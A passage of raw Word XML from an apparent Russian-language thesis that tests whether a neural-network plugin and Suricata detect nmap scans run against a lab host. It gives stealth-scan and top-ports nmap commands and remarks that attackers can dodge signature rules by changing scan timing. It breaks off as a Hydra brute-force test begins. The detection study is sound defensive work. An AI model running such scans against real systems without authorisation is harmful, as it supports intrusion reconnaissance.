        </w:rPr>
        <w:t xml:space="preserve"> — тихий скан (медленный, имитирует скрытную разведку):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35EC73" w14:textId="7208E229" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>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72413C66" w14:textId="77777777" w:rsidR="002A0DB3" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T2 192.168.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7907048C" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBCD404" w14:textId="49E7AC3B"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Обнаружение такого режима показано на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E67EE"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4286046E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="306DABA6" wp14:editId="706EB375">
            <wp:extent cx="6150610" cy="2571750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17534531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53189" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6154649" cy="2573439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE2C68" w14:textId="71ABDCA0" w:rsidR="00D70BA9" w:rsidRDefault="008E0171" w:rsidP="0056519B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>медленного сканирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E35E5" w14:textId="26CDBB30" w:rsidR="008E0171" w:rsidRDefault="000A1CD6" w:rsidP="002A245A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Режим </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — скан популярных портов:</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB4BB5" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FD3D485" w14:textId="77777777" w:rsidR="002A0DB3" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>top-ports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100 192.168.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12793710" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B67625" w14:textId="722581C3" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002A245A">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Обнаружение такого режима показано на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF4F44"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4CF0DE23" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21C9089E" wp14:editId="1916BFA0">
            <wp:extent cx="6037707" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="330159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9464" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6040438" cy="2849263"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86B70F" w14:textId="4A7F4D48" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– Обнаружение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сканирования портов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E29AC30"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1FBFA34D" w14:textId="115D029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534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Все четыре режима сканирования были успешно обнаружены нейросетевым плагином. Примечательно что тихое сканирование в режиме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> было идентифицировано как аномалия даже эффективнее чем стандартное. Это объясняется тем, что медленное сканирование создаёт аномально длинные по времени TCP-потоки с нетипичным соотношением входящих и исходящих пакетов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Агрессивный режим</w:t>
      </w:r>
      <w:r w:rsidR="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, с параметрами</w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-T5 -A</w:t>
      </w:r>
      <w:r w:rsidR="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сгенерировал наибольшее количество </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ввиду высокой интенсивности трафика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E8902D" w14:textId="3E92DCFA"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5671FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005671FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005671FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обнаружила агрессивное и быстрое сканирование, сформировав 12 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005671FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005671FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на основе сигнатур, идентифицирующих характерные комбинации TCP-флагов. Однако тихое сканирование и сканирование топ-100 портов не были обнаружены, так как интенсивность трафика не превысила пороговые значения, заданные в сигнатурах.</w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Так же стоит учесть, что </w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">злоумышленник может легко обойти такую защиту изменив временные </w:t>
      </w:r>
      <w:r w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>параметры сканирования или используя нестандартные инструменты без известных сигнатур. Нейросетевой плагин, напротив, обнаруживает аномалию по поведенческим признакам вне зависимости от используемого инструмента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EFC19A"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B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">71 </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E2EDB7"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01C644E0" w14:textId="4581ECF2" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 2. Атака методом перебора учётных данных </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4CEC1D"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60ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для тестирования устойчивости системы к атакам методом перебора учётных данных использовался инструмент </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00160ACC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00160ACC">
